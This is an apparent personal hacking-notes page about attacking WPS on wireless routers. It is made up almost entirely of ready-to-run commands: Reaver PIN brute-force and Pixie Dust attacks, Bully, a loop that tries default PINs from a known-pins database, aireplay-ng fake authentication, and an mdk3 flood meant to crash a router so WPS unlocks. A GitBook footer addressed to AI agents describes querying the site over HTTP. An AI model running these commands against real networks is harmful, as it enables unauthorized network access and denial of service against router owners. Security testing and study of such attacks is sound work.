> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/networking/wireless/wps.md). # WPS ### Reaver: ```bash # The next command brute forces WPS pins, online cracking similar to hydra (-vvv for verbose, --no-associate if we have previously associated with aireplay-ng --fakeauth) reaver -b -i wlan0mon -v reaver --bssid --channel --interface wlan0mon -vvv --no-associate # Pixie attack (-K), faster than the regular brute force, but doesn't always work, depends on the AP PRGA reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f # OR reaver -b -i wlan0mon -v -A --no-nacks # lower timedelay between guess using -d 0 or --dh-small # When the previous command is sent it stays waiting if we are not associated with the AP. We can do it with aireplay, so that the AP doesn't ignore the future packets that we will send (instead of 0 we can use a certain number of seconds to be associated) sudo aireplay-ng --fakeauth 120 -a wlan0mon ``` ``` ``` ## Bully: ```bash bully -d wlan0mon -b F0:7D:68:44:61:EA -B -c 6 ``` ### AP lookup: ```bash #Some APs use a pin that is linked to the first three bytes of the BSSID. Airgeddon contains them in known_pins.db #To check if a certain BSSID has known default pins, use the first three bytes of the AP (without the colon symbols, in this case XXYYZ for a BSSID= XX:YY:ZZ:AA:BB:CC) source /usr/share/airgeddon/known_pins.db echo ${PINDB["XXYYZZ"]} > pins.txt cat pins.txt | while read pin; do reaver -b F0:7D:68:44:61:EA -i wlan0mon -v -c 6 --no-nacks -p $pin; done ``` ### DoS Router to restart/unlock WPS: ```bash # DoS to an AP, with different MACs, as if it were a DDoS. Some routers reboot when too many different MACs try to connect to them because they cannot handle so many connections # Help of the "a" option of mdk3 (used for DoS) withs mdk3 --help a # DoS (-m for using real looking MACs, not arbitrary ones like 00:00:00:00:00:00) mdk3 wlan0mon a -a -m ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://f1rstbyt3.gitbook.io/hacking-notes/networking/wireless/wps.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.